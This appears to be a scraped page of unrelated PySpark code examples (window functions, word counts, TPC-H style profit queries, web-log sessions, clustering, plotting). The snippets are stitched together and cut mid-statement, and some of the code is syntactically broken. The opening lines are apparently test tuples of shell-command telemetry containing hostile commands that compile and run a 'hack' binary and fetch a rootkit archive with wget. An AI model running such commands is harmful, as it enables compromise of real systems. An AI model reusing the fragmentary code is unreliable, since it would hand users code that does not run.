  ("gcc hack.c -o hack;./hack".split(" "),"2015-12-07","root","msr-telemetry-cass06","msr-dev-nsw-o01","sn-discovery-unix",),
  ("wget http://wwww.my.com/rootkit.gz".split(" "),"2015-12-07","root","msr-telemetry-cass06","msr-dev-nsw","sn-discovery-unix", ),
  ("echo, $?".split(" "),"2015-12-07","root","msr-telemetry-cass06","msr-dev-nsw-o01.domain.org","sn-discovery-unix", ),
  ("asdjgiuarsjhgiurewhgjui asdadfsadf sdf".split(" "),"2015-12-07","root","msr-telemetry-cass06","","sn-discovery-unix", ),
Exemple #30
0
DataFrame[emp_id: bigint, emp_name: string, emp_city: string, emp_salary: double]
>>> old_df.unionAll(new_df).show()
+------+--------+---------+----------+
|emp_id|emp_name| emp_city|emp_salary|
+------+--------+---------+----------+
|     1|    John|   Sydney|   35000.0|
|     2|   Peter|Melbourne|   45000.0|
|     3|     Sam|   Sydney|   55000.0|
|     2|   Peter|Melbourne|   55000.0|
|     5|  Jessie| Brisbane|   42000.0|
+------+--------+---------+----------+

>>> union_df=old_df.unionAll(new_df)
>>> from pyspark.sql import Window

window_agg=Window.partitionBy("emp_id").orderBy(F.desc("emp_salary"))


>>> union_df.select(F.row_number().over(window_agg).alias("rn"),"*").filter("rn=1").select(new_df.columns).orderBy("emp_id").show()
+------+--------+---------+----------+
|emp_id|emp_name| emp_city|emp_salary|
+------+--------+---------+----------+
|     1|    John|   Sydney|   35000.0|
|     2|   Peter|Melbourne|   55000.0|
|     3|     Sam|   Sydney|   55000.0|
|     5|  Jessie| Brisbane|   42000.0|
+------+--------+---------+----------+



===================================================================================================================================
def words_relevance(words_specific_df, sqlContext, high_type='all'):
    '''
    words_specific_df : 需要计算距离的目标词 , pandas dataframe  
    '''
    if high_type == 'all':
        words_specific_df = None
    coef_col_name = ''
    storage_table1 = '{0}.effect_words_relevance_product_name'.format(
        database_name)
    storage_table2 = '{0}.effect_words_relevance_in_each_product_name'.format(
        database_name)
    # 1 extract word column
    if words_specific_df != None:
        target_word_df = words_specific_df[['word']].copy()
    else:
        target_word_df = None
    # 2 get word-comments_ cut result
    idx_name = 'product_id'
    doc_table = params['shared']['doc_cut_word_table']
    comments_words_new = sqlContext.sql(
        "select product_id as {0},cut_word_flag as comments_words_new from {1}.{2}"
        .format(idx_name, database_name, doc_table))

    # 3 calculate relevance in each comment
    def words_relevance_one_comment(comment_split_words,
                                    target_word_df=target_word_df):
        '''
        计算单个评价句子中 目标词和有效词性的词的上下文关联度
        目标词 target_word_df 不传入时 , 则计算句子中每个词之间的上下文关联度(当前默认)
        单个评价 示例 comment_split_words=[{'word':'不用','flag':'v'},{'word':'担心','flag':'v'},{'word':'简约','flag':'a'},{'word':'时尚','flag':'an'},{'word':'拿着','flag':'vu'},{'word':'质量','flag':'n'}]
        return relevance_in_each_comment  每个句子中  词的关联度
        '''
        if type(comment_split_words) == type(sp_row()):
            idx = comment_split_words[idx_name]
            comment_split_words = comment_split_words['comments_words_new']
        effect_flag_weight = pds.DataFrame([('n', 1), ('ns', 1), ('nt', 1),
                                            ('nr', 0.5), ('nz', 0.67),
                                            ('nv', 0.67), ('vn', 0.67),
                                            ('an', 0.67)],
                                           columns=['flag', 'weight'])
        if len(comment_split_words) > 0:
            comment_words_df = pds.DataFrame(comment_split_words)

            if target_word_df != None:
                comment_words_df = comment_words_df.loc[
                    (comment_words_df.word.isin(target_word_df.word)) |
                    (comment_words_df.flag.isin(effect_flag_weight.flag)
                     ), :].reset_index().rename(columns={'index': 'position'})
                flag_words = pds.merge(comment_words_df,
                                       effect_flag_weight,
                                       on='flag',
                                       how='inner',
                                       sort=False).rename(
                                           columns={
                                               'position': 'flag_pos',
                                               'flag': 'flag_flag',
                                               'word': 'flag_word'
                                           })
                target_words = pds.merge(comment_words_df,
                                         target_word_df,
                                         on='word',
                                         how='inner',
                                         sort=False).rename(
                                             columns={
                                                 'position': 'target_pos',
                                                 'flag': 'target_flag',
                                                 'word': 'target_word'
                                             })
            else:
                comment_words_df = comment_words_df.reset_index().rename(
                    columns={'index': 'position'})
                flag_words = comment_words_df.copy()
                flag_words['weight'] = 1.0
                flag_words.rename(columns={
                    'position': 'flag_pos',
                    'flag': 'flag_flag',
                    'word': 'flag_word'
                },
                                  inplace=True)
                target_words = comment_words_df.copy()
                target_words.rename(columns={
                    'position': 'target_pos',
                    'flag': 'target_flag',
                    'word': 'target_word'
                },
                                    inplace=True)
            if flag_words.shape[0] > 0 and target_words.shape[0] > 0:
                #目标词和有效词的df 求笛卡尔积
                flag_words['dikar_id'] = 0
                target_words['dikar_id'] = 0
                merge_df = pds.merge(flag_words, target_words, on='dikar_id')
                # tips :若词与自己进行计算 ,先加一个值0.9,避免求出 inf
                merge_df.loc[merge_df.flag_pos == merge_df.target_pos,
                             'target_pos'] = merge_df.loc[merge_df.flag_pos ==
                                                          merge_df.target_pos,
                                                          'target_pos'] + 0.9
                merge_df['pos_diff'] = npy.abs(merge_df.flag_pos -
                                               merge_df.target_pos)
                merge_df['each_relevance'] = merge_df.weight / (npy.power(
                    merge_df.pos_diff,
                    merge_df.pos_diff / 2.0))  # 使上下文距离的 衰减速度 随距离增大而增大
                # 一个句子中,目标词和有效词只能有一个 关联度 ,当存在重复多个时,取单个句子内的最大关联。
                merge_df_group = merge_df.groupby(
                    ['flag_word',
                     'target_word'])['each_relevance'].max().reset_index()
                merge_df = merge_df.drop_duplicates(
                    subset=['flag_word', 'target_word'])[[
                        'flag_word', 'target_word', 'flag_flag', 'target_flag'
                    ]]
                merge_df_group = pds.merge(merge_df_group.copy(),
                                           merge_df,
                                           on=['flag_word', 'target_word'])
                merge_df_group[idx_name] = idx
                relevance_in_each_comment = merge_df_group.values.tolist()
            else:
                relevance_in_each_comment = []
        else:
            relevance_in_each_comment = []
        return relevance_in_each_comment

    relevance_in_each_comment = comments_words_new.rdd.flatMap(
        words_relevance_one_comment)  #
    relevance_in_each_comment_df = sqlContext.createDataFrame(
        relevance_in_each_comment, [
            'flag_word', 'target_word', 'each_relevance', 'flag_flag',
            'target_flag', idx_name
        ])
    #relevance_in_each_comment_df.persist(StorageLevel(True,True,False,False,1))
    #no_out=sqlContext.sql('drop table if exists {0}'.format(storage_table2)).collect()
    relevance_in_each_comment_df.write.saveAsTable(
        '{0}'.format(storage_table2), mode='overwrite')  # 80 executor 很快。。
    relevance_in_each_comment_df = sqlContext.sql(
        'select * from {0}'.format(storage_table2))
    # 4 calculate summary_relevance
    effect_words_relevance_tem = relevance_in_each_comment_df.groupBy(
        ['flag_word', 'target_word']).agg(F.sum('each_relevance'),
                                          F.count('each_relevance'),
                                          F.avg('each_relevance'))
    effect_words_relevance_tem = effect_words_relevance_tem.withColumnRenamed(
        'sum(each_relevance)', 'sum_relevance').withColumnRenamed(
            'count(each_relevance)',
            'total_comment_num').withColumnRenamed('avg(each_relevance)',
                                                   'avg_relevance')
    effect_words_relevance = effect_words_relevance_tem.withColumn(
        'final_relevance_coef',
        F.pow(effect_words_relevance_tem.sum_relevance, 2) /
        effect_words_relevance_tem.total_comment_num)
    # 4.2 rank in partition
    windw = Window.partitionBy('flag_word').orderBy(
        F.desc('final_relevance_coef'))
    effect_words_relevance = effect_words_relevance.select(
        '*',
        F.rank().over(windw).alias('rank_in_flag_word'))
    # 4.3 append word_flag
    words_flag_tem = relevance_in_each_comment_df.drop_duplicates(
        ['flag_word', 'target_word']).select('flag_word', 'target_word',
                                             'flag_flag', 'target_flag')
    effect_words_relevance = effect_words_relevance.join(
        words_flag_tem, ['flag_word', 'target_word'])
    # 4.4 append target word emo_promote_coef
    if high_type != 'all':
        words_specific_df = sqlContext.createDataFrame(words_specific_df)
        effect_words_relevance = effect_words_relevance.join(
            words_specific_df, effect_words_relevance.target_word ==
            words_specific_df.word).select(
                'flag_word', 'target_word', 'flag_flag', 'target_flag',
                'sum_relevance', 'total_comment_num', 'avg_relevance',
                'final_relevance_coef', 'rank_in_flag_word', coef_col_name)
    else:
        effect_words_relevance = effect_words_relevance.select(
            'flag_word', 'target_word', 'flag_flag', 'target_flag',
            'sum_relevance', 'total_comment_num', 'avg_relevance',
            'final_relevance_coef', 'rank_in_flag_word')
    #effect_words_relevance.persist(StorageLevel(True,True,False,False,1))
    #no_out=sqlContext.sql('drop table if exists {0}'.format(storage_table1)).collect()
    effect_words_relevance.write.saveAsTable('{0}'.format(storage_table1),
                                             mode='overwrite')
    return 'effect_words_relevance run over'
# <h1>Process Data using pyspark.sql</h1>
# <p>Set the Hadoop configuration.</p>

# In[8]:

# Python expressions in a code cell will be outputted after computation
expenditures_df.printSchema()


# In[9]:

# Sorting the data using spark sql
from pyspark.sql.functions import desc, asc

factor = expenditures_df.sort(desc('(% OF GDP)')).limit(10).toPandas()
factor_re = expenditures_df.sort(asc('(% OF GDP)')).limit(10).toPandas()


# In[10]:

print factor


# In[11]:

life = life_expectancy_df.sort(desc('(YEARS)')).limit(10).toPandas()
life_re = life_expectancy_df.sort(asc('(YEARS)')).limit(10).toPandas()


# In[12]:
 def question_one(self):
     self.rawDF.withColumn("raised_funds", self.money_to_int("raised_funds"))\
               .groupBy("sweets")\
               .agg(f.sum("raised_funds").alias("total_funds"))\
               .orderBy(f.desc("total_funds"))\
               .show(10, False)
    df = spark.createDataFrame([], original_schema)
    text = row.ctext
    newRow = spark.createDataFrame([(text, text)], cols)
    df = df.union(newRow)
    #df = df.withColumnRenamed("ctext\r","ctext")
    sentencesDF = df.select(explode(split(df.ctext, "\.")).alias("sentences"))
    sentencesDF = sentencesDF.na.drop()
    tokenized = tokenize(sentencesDF)
    edited = stopwords_removal(tokenized)
    edgelist = createEdges(edited)
    edgeData = sc.parallelize(edgelist)
    schema = StructType([
        StructField("src", StringType(), True),
        StructField("dst", StringType(), True),
        StructField("score", FloatType(), True)
    ])
    edgeDF = spark.createDataFrame(edgeData, schema)
    vertices = edited.withColumnRenamed("sentences", "id")
    gFrame = GraphFrame(vertices, edgeDF)
    ranks = gFrame.pageRank(resetProbability=0.5, maxIter=20)
    sorted_ranks = ranks.vertices.orderBy(desc("pagerank")).limit(5)
    sentence_final = ""
    for srow in sorted_ranks.collect():
        sentence_final = sentence_final + srow.id + "."

    final_df_row = spark.createDataFrame([(text, sentence_final)], cols)
    final_df = final_df.union(final_df_row)

final_df.repartition(1).write.csv(
    "s3://project.summary/output.prob.05.max.20/.csv")
print("End of Summarization")
Exemple #35
0
                            postgres_user).option("password",
                                                  postgres_pwd).load())

df_ratings = (spark.read.format("jdbc").option("url", postgres_db).option(
    "dbtable",
    "public.ratings").option("user",
                             postgres_user).option("password",
                                                   postgres_pwd).load())

####################################
# Tpo 10 movies with more ratings
####################################
df_movies = df_movies.alias("m")
df_ratings = df_ratings.alias("r")

df_join = df_ratings.join(df_movies,
                          df_ratings.movieId == df_movies.movieId).select(
                              "r.*", "m.title")

df_result = (df_join.groupBy("title").agg(
    F.count("timestamp").alias("qty_ratings"),
    F.mean("rating").alias("avg_rating")).sort(
        F.desc("qty_ratings")).limit(10))

print("######################################")
print("EXECUTING QUERY AND SAVING RESULTS")
print("######################################")
# Save result to a CSV file
df_result.coalesce(1).write.format("csv").mode("overwrite").save(
    "/usr/local/spark/resources/data/output_postgres", header=True)
Exemple #36
0
    (unix_timestamp(max("data_timestamp").over(window_sessions)) -
     unix_timestamp(min("data_timestamp").over(window_sessions))) / 60)

df.groupBy("client_ip").count().show()

# This is the sample IP address that I used to creating the queries.
test = df.orderBy("client_ip",
                  "data_timestamp").where("client_ip = '156.101.9.1'")
test2 = test.withColumn("prev_time",
                        lag(test.data_timestamp).over(window_clients))
test3 = test2.withColumn(
    "session",
    sum((coalesce(
        (unix_timestamp("data_timestamp") - unix_timestamp("prev_time")) / 60,
        lit(0)) > 15).cast("int")).over(window_clients))
test3.withColumn(
    "total_session_time",
    (unix_timestamp(max("data_timestamp").over(window_sessions)) -
     unix_timestamp(min("data_timestamp").over(window_sessions))) / 60)
test3.select("client_ip", "session",
             "request_url").distinct().groupBy("request_url").count().show()

# This is the query to get the average session time.
df.select(avg("total_session_time")).show()
# This is the query to get the most engaged users.
df.select("client_ip", "total_session_time").distinct().orderBy(
    desc("total_session_time")).show()
# This is the query to get the unique URL visits per session
df.select("client_ip", "session",
          "request_url").distinct().groupBy("request_url").count().show()
df.groupBy("state").sum("salary").show()

dfGroup=df.groupBy("state") \
          .agg(sum("salary").alias("sum_salary"))

dfGroup.show(truncate=False)

dfFilter = dfGroup.filter(dfGroup.sum_salary > 100000)
dfFilter.show()

from pyspark.sql.functions import asc
dfFilter.sort("sum_salary").show()

from pyspark.sql.functions import desc
dfFilter.sort(desc("sum_salary")).show()

df.groupBy("state") \
  .agg(sum("salary").alias("sum_salary")) \
  .filter(col("sum_salary") > 100000)  \
  .sort(desc("sum_salary")) \
  .show()

df.createOrReplaceTempView("EMP")
spark.sql("select state, sum(salary) as sum_salary from EMP " +
          "group by state having sum_salary > 100000 " +
          "order by sum_salary desc").show()

df.groupBy("state") \
  .sum("salary") \
  .withColumnRenamed("sum(salary)", "sum_salary") \
Exemple #38
0
aggdf = spark.read.format("csv").option("header", "true").option("inferSchema", "true").load("dbfs:/FileStore/tables/retail_data_all-db128.txt").coalesce(5)

aggdf.cache()

aggdf.createOrReplaceTempView("aggtable")
#aggdf.show(10)

#from pyspark.sql.functions import distinct
aggdf.select("InvoiceNo").distinct().count()

from pyspark.sql.functions import countDistinct, approx_count_distinct, col
aggdf.select(countDistinct(col("StockCode"))).show()

from pyspark.sql.functions import first, last, desc
aggdf.orderBy(desc("UnitPrice")).show()

from pyspark.sql.functions import sum, count, avg, expr
aggdf.select(
count("Quantity").alias("total_transactions"),
sum("Quantity").alias("total_purchases"),
avg("Quantity").alias("avg_purchases"),
expr("mean(Quantity)").alias("mean_purchases"))\
.selectExpr(
"total_purchases/total_transactions",
"avg_purchases",
"mean_purchases").show()

from pyspark.sql.functions import collect_set, collect_list
aggdf.agg(collect_set("Description"), collect_list("Description")).show()

from pyspark.sql.window import Window
Exemple #39
0
from pyspark.context import SparkContext

# In[2]:
from config import datalake_features_path, datalake_staged_path, daily_feature_countries

# In[3]:
spark = SparkSession.builder.appName('covid_daily_feature').getOrCreate()

# In[4]:
df = (spark.read.option("header", "true").option(
    "inferSchema", "true").load(datalake_staged_path + "/full"))

# In[5]:
df = (
    df.filter((col("country_region").isin(daily_feature_countries))).filter(
        col("province_state") == "n/a").orderBy(desc("date"))
    # Two days for 2 countries
    .limit(2 * 2))

# In[6]:
window = Window.partitionBy("country_region").orderBy("date")

df_lag = (df.withColumn('prev_confirmed',
                        lag(col('confirmed')).over(window)).withColumn(
                            'prev_deaths',
                            lag(col('deaths')).over(window)).withColumn(
                                'prev_recovered',
                                lag(col('recovered')).over(window)))

result = (df_lag.withColumn(
    'new_confirmed',
Exemple #40
0
    partial(histogram, bins=np.logspace(0, 32, 33, base=2)),
    ArrayType(LongType()),
    F.PandasUDFType.GROUPED_AGG,
)
hist_l_count = F.pandas_udf(
    partial(histogram, bins=np.logspace(0, 25, 26, base=2)),
    ArrayType(LongType()),
    F.PandasUDFType.GROUPED_AGG,
)
hist_d_count = F.pandas_udf(
    partial(histogram, bins=np.logspace(0, 25, 26, base=2)),
    ArrayType(LongType()),
    F.PandasUDFType.GROUPED_AGG,
)

w = Window().partitionBy("date", "categories").orderBy(F.desc("view_count"))
top_v = (
    scaled.withColumn("date", F.date_trunc("week", "upload_date")).select(
        "date",
        "upload_date",
        "categories",
        "display_id",
        "view_count",
        "like_count",
        "dislike_count",
        "duration",
        ((F.col("like_count") + F.col("dislike_count")) /
         F.col("view_count")).alias("engagement_score"),
        F.rank().over(w).alias("rank"),
    ).filter("rank <= 20").drop("rank")
    # .groupBy("date", "categories")
Exemple #41
0
for center in centers:
    print(center)

# Predict the label of each hacking attempt
    
Final_Model_LocationCoded.transform(FinalData_LocationCoded).select('prediction').show(10)


# In[6]:

#formingClusters

#Without Location

clusters_NoLocation = Final_Model_NoLocation.transform(FinalData_NoLocation).select('*')
clusters_NoLocation.groupBy("prediction").count().orderBy(F.desc("count")).show()
clusters_NoLocation.show()
clusters_NoLocation_pd = clusters_NoLocation.toPandas()
clusters_NoLocation_pd.to_csv("Clusters_NoLocation.csv")

#With LocationIndex

clusters_LocationIndex = Final_Model_LocationIndex.transform(FinalData_LocationIndex).select('*')
clusters_LocationIndex.groupBy("prediction").count().orderBy(F.desc("count")).show()
clusters_LocationIndex.show()
clusters_LocationIndex_pd = clusters_LocationIndex.toPandas()
clusters_LocationIndex_pd.to_csv("clusters_LocationIndex.csv")

#With LocationCoded

clusters_LocationCoded = Final_Model_LocationCoded.transform(FinalData_LocationCoded).select('*')
def bar_plot(df_in,
             top_n=20,
             rotation=True,
             output_dir=None,
             display=False,
             tracking=False):
    """
    Bar plot for the categorical features in the rdd data frame.

    :param df_in: the input rdd data frame
    :param top_n: the number of the most frequent feature to show in the bar plot
    :param rotation: the flag for rotating the xticks in the plot, the default value is True
    :param output_dir: the out put directory, the default value is the current working directory
    :param display: the flag for displaying the figures, the default value is False
    :param tracking: the flag for displaying CPU time, the default value is False
    """
    _, _, cat_fields, date_fields, _ = dtypes_class(df_in)

    cat_fields = cat_fields + date_fields
    if cat_fields:
        df_in = df_in.select(cat_fields)

        if output_dir is None:
            out_path = os.getcwd() + '/Audited'
        else:
            out_path = output_dir + '/Audited'
        mkdir(out_path)

        print(
            '================================================================')
        print('The Bar plot Bar_plots.pdf was located at:')
        print(out_path)
        if tracking:
            start = time.time()

        pdf = PdfPages(out_path + '/03-Bar_plots.pdf')
        for col in df_in.columns:
            p_data = df_in.select(col).na.drop().groupBy(col).count().sort(
                F.desc('count')).limit(top_n).toPandas()

            if tracking:
                print('Plotting barplot of {}.... Please be patient!'.format(
                    col))
            plt.ioff()
            fig = plt.figure(figsize=(20, 15))
            sns.barplot(x=col, y="count", data=p_data)
            plt.title('Barplot of {}'.format(col), fontsize=20)
            plt.xlabel('{}'.format(col), fontsize=20)
            plt.ylabel('number of counts', fontsize=20)
            if rotation:
                plt.xticks(rotation=90)
            pdf.savefig(fig)
            if display:
                plt.show()
            plt.close(fig)
        if tracking:
            print('Bar plots are DONE!!!')
        pdf.close()

        if tracking:
            end = time.time()
            print('Generate bar plots took = ' + str(end - start) + ' s')
    else:
        print('Caution: no categorical features in the dataset!!!')
Exemple #43
0
# How many users are female?
# TODO: write your code to answer question 3
females = user_log.filter(user_log.gender == 'F') \
    .select('userId', 'gender') \
    .dropDuplicates() \
    .count()
print(f'Famale users: {females}\n')

########################## Question 4 ##########################
# How many songs were played from the most played artist?
# TODO: write your code to answer question 4
user_log.filter(user_log.page == 'NextSong') \
    .select('Artist') \
    .groupBy('Artist') \
    .agg({'Artist' : 'count'}) \
    .sort(desc('count(Artist)')) \
    .withColumnRenamed('count(Artist)', 'Play_count') \
    .show(1)

########################## Question 5 (challenge) ##########################
# How many songs do users listen to on average between visint our home page? Round to closest integer
function = udf(lambda ishome: int(ishome == 'Home'), IntegerType())

user_window = Window \
    .partitionBy('userID') \
    .orderBy(desc('ts')) \
    .rangeBetween(Window.unboundedPreceding, 0)

cusum = user_log.filter((user_log.page == 'NextSong') | (user_log.page == 'Home')) \
    .select('userID', 'page', 'ts') \
    .withColumn('homevisit', function('page')) \
Exemple #44
0
p_temp = part.filter("p_name like '%dim%'")
s_l = lineitem.join(supplier,lineitem.L_SUPPKEY == supplier.S_SUPPKEY)
s_l_ps = s_l.join((partsupp,s_l.L_SUPPKEY == partsupp.PS_SUPPKEY) & (s_l.L_PARTKEY == partsupp.PS_PARTKEY ))
s_l_ps_p = s_l_ps.join(part,s_l_ps.PS_PARTKEY == part.P_PARTKEY)
s_l_ps_p_o = s_l_ps_p.join(orders, s_l_ps_p.L_ORDERKEY == orders.O_ORDERKEY)
s_l_ps_p_o_n = s_l_ps_p_o.join(nation,s_l_ps_p_o.S_NATIONKEY == nation.N_NATIONKEY)
profit = s_l_ps_p_o_n
.select(s_l_ps_p_o_n.N_NAME.alias("NATION"),
        F.year(s_l_ps_p_o_n.O_ORDERDATE).alias("O_YEAR"),(s_l_ps_p_o_n.L_EXTENDEDPRICE * (1 - s_l_ps_p_o_n.L_DISCOUNT) - s_l_ps_p_o_n.PS_SUPPLYCOST * s_l_ps_p_o_n.L_QUANTITY).alias("AMOUNT"))

res = profit
    .select(profit.NATION,profit.AMOUNT,profit.O_YEAR)
    .groupBy(profit.NATION,profit.O_YEAR)
    .agg(F.sum(profit.AMOUNT).alias("SUM_PROFIT"))
    .orderBy(profit.NATION,F.desc("O_YEAR"))

p_temp = part.filter("p_name like '%dim%'")
l_p = p_temp.join(lineitem, p_temp.P_PARTKEY == lineitem.L_PARTKEY)
n_s = nation.join(supplier,nation.N_NATIONKEY == supplier.S_NATIONKEY)
l_p_s = l_p.join(n_s,l_p.L_SUPPKEY == n_s.S_SUPPKEY)
l_p_s_ps = l_p_s.join(partsupp,l_p_s.L_SUPPKEY == partsupp.PS_SUPPKEY)
l_p_s_ps_o = l_p_s_ps.join(orders,l_p_s_ps.L_ORDERKEY == orders.O_ORDERKEY)

profit = l_p_s_ps_o.select(l_p_s_ps_o.N_NAME,F.year(l_p_s_ps_o.O_ORDERDATE).alias("O_YEAR"),(l_p_s_ps_o.L_EXTENDEDPRICE * (1 - l_p_s_ps_o.L_DISCOUNT) - l_p_s_ps_o.PS_SUPPLYCOST * l_p_s_ps_o.L_QUANTITY).alias("AMOUNT"))

res = profit
    .groupBy(profit.N_NAME,profit.O_YEAR)
    .agg(F.sum(profit.AMOUNT).alias("SUM_PROFIT"))
    .orderBy(l_p_s_ps_o.N_NAME,F.desc("O_YEAR"))
# MAGIC %md ## Window functions ##

# COMMAND ----------

#Add a new date column
spark.sql("set spark.sql.legacy.timeParserPolicy=LEGACY")
from pyspark.sql.functions import col, to_date, desc, max, dense_rank
from pyspark.sql.window import Window
dfWithDate = df.withColumn("date", to_date(col("InvoiceDate"),
                                           "MM/d/yyyy H:mm"))

#1 define a window - use all preceding rows up and until current row
windowSpec = Window\
            .partitionBy("CustomerID","date")\
            .orderBy(desc("Quantity"))\
            .rowsBetween(Window.unboundedPreceding, Window.currentRow)
#2 define aggregation maxPurchaseQuantity
maxPurchaseQuantity = max(col("Quantity")).over(windowSpec)
print(maxPurchaseQuantity)

#2.1 purchaseRank
purchaseDenseRank = dense_rank().over(windowSpec)
print(purchaseDenseRank)

# COMMAND ----------

# 3 Perform a Select
dfWithDate.where("CustomerId IS NOT NULL AND ").orderBy("CustomerId")\
.select(
    col("CustomerId"),
Exemple #46
0
adlocation.printSchema()
adlocation.cache()

vpn = ctx.read.load('/user/cloudera/ciscovpn')
vpn.printSchema()
vpn.cache()

def func(x):
    gi = GeoIP.open("GeoIP.dat",GeoIP.GEOIP_MEMORY_CACHE)
    cc = gi.country_code_by_addr(x.remoteip)
    return Row(bytesrcv=x.bytesrcv, bytesxmt=x.bytesxmt, duration=x.duration, localip=x.localip, reason=x.reason,
               remoteip=x.remoteip, source=x.source, time=x.time, user=x.user, date=x.date, remoteipcc=cc)

vpnDF = vpn.map(func).toDF()
joinDF = vpnDF.join(adlocation, vpnDF.user == adlocation.EmailAddress)
joinDF.cache()

fromOtherLocations = joinDF.filter("remoteipcc <> c")
cntLoginExtLocation = fromOtherLocations.count()

groupDF = fromOtherLocations.groupBy(fromOtherLocations.user, fromOtherLocations.remoteip, fromOtherLocations.remoteipcc, fromOtherLocations.c)\
    .count()\
    .orderBy(desc('count'))

groupDF.cache()

countbyCountry = fromOtherLocations.groupBy(groupDF.user, groupDF.remoteipcc).count().orderBy(desc('count'))


Exemple #47
0
# MAGIC %md
# MAGIC For your final task, you'll group by word and count the number of times each word occurs.  Make sure to return the counts in descending order and to call them `counts`.
# MAGIC  
# MAGIC For this task, you can use:
# MAGIC  * `DataFrame` operations `groupBy`, `agg`, and `sort`
# MAGIC  * the `Column` operation `alias`
# MAGIC  * functions `func.count` and `func.desc`.

# COMMAND ----------

# ANSWER
wordGroupCount = (wordList
                  .groupBy('word')  # group
                  .agg(func.count('word').alias('counts'))  # aggregate
                  .sort(func.desc('counts')))  #sort

wordGroupCount.take(5)

# COMMAND ----------

# TEST
Test.assertEquals(tuple(wordGroupCount.first()), (u'ref', 29263), 'incorrect counts.')

# COMMAND ----------

# MAGIC %md
# MAGIC We could also use SQL to accomplish this counting.

# COMMAND ----------
#!/usr/bin/python

from pyspark import SparkContext
from pyspark.sql import SQLContext, Row
from pyspark.sql.functions import asc, desc

if __name__ == "__main__":
  sc = SparkContext(appName='resort data')
  sqlContext = SQLContext(sc)

  df = sqlContext.read.load('hdfs://discovery3:9000/tmp/dasmith/c19-20160919-a50-o08/pretty.parquet')
  #df = sqlContext.read.load('hdfs://discovery3:9000/tmp/dasmith/c19-20160402-a50-o08/out.parquet')
  df.registerTempTable("newspaper")
  df2 = sqlContext.sql("select series, date, count(*) as cnt from newspaper group by series, date order by cnt desc")
  df3 = df.join(df2, ['series', 'date'])
  df3.sort(desc("cnt"), asc("begin"), asc("end"))\
     .write.json('/gss_gpfs_scratch/xu.shao/network/resorted-pretty.json')
###############################################################
###															###
###															###
###   						SORT and ORDER					###
###															###
###															###
############################################################### 

# Get the five oldest people in the list. To do that, sort by age in descending order using orderBy transformation
orderdataDF = dataDF.orderBy(dataDF.age.desc())
display(orderdataDF.take(5))

# desc() order correct/alternate format
from pyspark.sql.functions import desc
WordsAndCountsDF = wordCount(shakeWordsDF)
topWordsAndCountsDF = WordsAndCountsDF.orderBy(desc("count"))
topWordsAndCountsDF.show()

# for ascending order
orderdataDF = dataDF.orderBy(dataDF.age)
display(orderdataDF.take(5))

# SORT operation
new_sorted_df = (original_df.groupBy('somecolumn').count().sort('somecolumn',ascending=False).cache())
Sorted_df = OriginalDF.select('A_Column').groupBy('A_Column').count().sort('count', ascending=False) # Sorting by 'A_Column'

###############################################################
###															###
###															###
###   				CACHING AND STORAGE						###
###															###
Exemple #50
0
# MAGIC %md
# MAGIC ** (4e) Count the words **
# MAGIC 
# MAGIC We now have a DataFrame that is only words.  Next, let's apply the `wordCount()` function to produce a list of word counts. We can view the first 20 words by using the `show()` action; however, we'd like to see the words in descending order of count, so we'll need to apply the [`orderBy` DataFrame method](http://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrame.orderBy) to first sort the DataFrame that is returned from `wordCount()`.
# MAGIC 
# MAGIC You'll notice that many of the words are common English words. These are called stopwords. In a later lab, we will see how to eliminate them from the results.

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code
from pyspark.sql.functions import desc
topWordsAndCountsDF = (shakeWordsDF
                       .groupBy(shakeWordsDF.word)
                       .count()
                       .orderBy(desc('count'))
                      )
topWordsAndCountsDF.show()

# COMMAND ----------

# TEST Count the words (4e)
Test.assertEquals(topWordsAndCountsDF.take(15),
                  [(u'the', 27361), (u'and', 26028), (u'i', 20681), (u'to', 19150), (u'of', 17463),
                   (u'a', 14593), (u'you', 13615), (u'my', 12481), (u'in', 10956), (u'that', 10890),
                   (u'is', 9134), (u'not', 8497), (u'with', 7771), (u'me', 7769), (u'it', 7678)],
                  'incorrect value for top15WordsAndCountsDF')

# COMMAND ----------

# MAGIC %md
    def _calculate_rate(instance_usage_df):
        instance_usage_data_json_list = []

        try:
            sorted_oldest_ascending_df = instance_usage_df.sort(
                functions.asc("processing_meta.oldest_timestamp_string"))

            sorted_latest_descending_df = instance_usage_df.sort(
                functions.desc("processing_meta.latest_timestamp_string"))

            # Calculate the rate change by percentage
            oldest_dict = sorted_oldest_ascending_df.collect()[0].asDict()
            oldest_quantity = float(oldest_dict[
                                    "processing_meta"]["oldest_quantity"])

            latest_dict = sorted_latest_descending_df.collect()[0].asDict()
            latest_quantity = float(latest_dict[
                                    "processing_meta"]["latest_quantity"])

            rate_percentage = 100 * (
                (oldest_quantity - latest_quantity) / oldest_quantity)

            # get any extra data
            extra_data_map = getattr(sorted_oldest_ascending_df.collect()[0],
                                     "extra_data_map", {})
        except Exception as e:
            raise PreHourlyCalculateRateException(
                "Exception occurred in pre-hourly rate calculation. Error: %s"
                % str(e))
        #  create a new instance usage dict
        instance_usage_dict = {"tenant_id":
                               latest_dict.get("tenant_id", "all"),
                               "user_id":
                               latest_dict.get("user_id", "all"),
                               "resource_uuid":
                               latest_dict.get("resource_uuid", "all"),
                               "geolocation":
                               latest_dict.get("geolocation", "all"),
                               "region":
                               latest_dict.get("region", "all"),
                               "zone":
                               latest_dict.get("zone", "all"),
                               "host":
                               latest_dict.get("host", "all"),
                               "project_id":
                               latest_dict.get("project_id", "all"),
                               "aggregated_metric_name":
                               latest_dict["aggregated_metric_name"],
                               "quantity": rate_percentage,
                               "firstrecord_timestamp_unix":
                               oldest_dict["firstrecord_timestamp_unix"],
                               "firstrecord_timestamp_string":
                               oldest_dict["firstrecord_timestamp_string"],
                               "lastrecord_timestamp_unix":
                               latest_dict["lastrecord_timestamp_unix"],
                               "lastrecord_timestamp_string":
                               latest_dict["lastrecord_timestamp_string"],
                               "record_count": oldest_dict["record_count"] +
                               latest_dict["record_count"],
                               "usage_date": latest_dict["usage_date"],
                               "usage_hour": latest_dict["usage_hour"],
                               "usage_minute": latest_dict["usage_minute"],
                               "aggregation_period":
                               latest_dict["aggregation_period"],
                               "extra_data_map": extra_data_map
                               }

        instance_usage_data_json = json.dumps(instance_usage_dict)
        instance_usage_data_json_list.append(instance_usage_data_json)

        # convert to rdd
        spark_context = instance_usage_df.rdd.context
        return spark_context.parallelize(instance_usage_data_json_list)
Exemple #52
0
comments = spark_read.parquet(path=data_dir.make_interim_path('comments'))
case_status_history = spark_read.parquet(
    path=data_dir.make_interim_path('case_status_history'))

ref_ids_escalated = (case_status_history.filter(
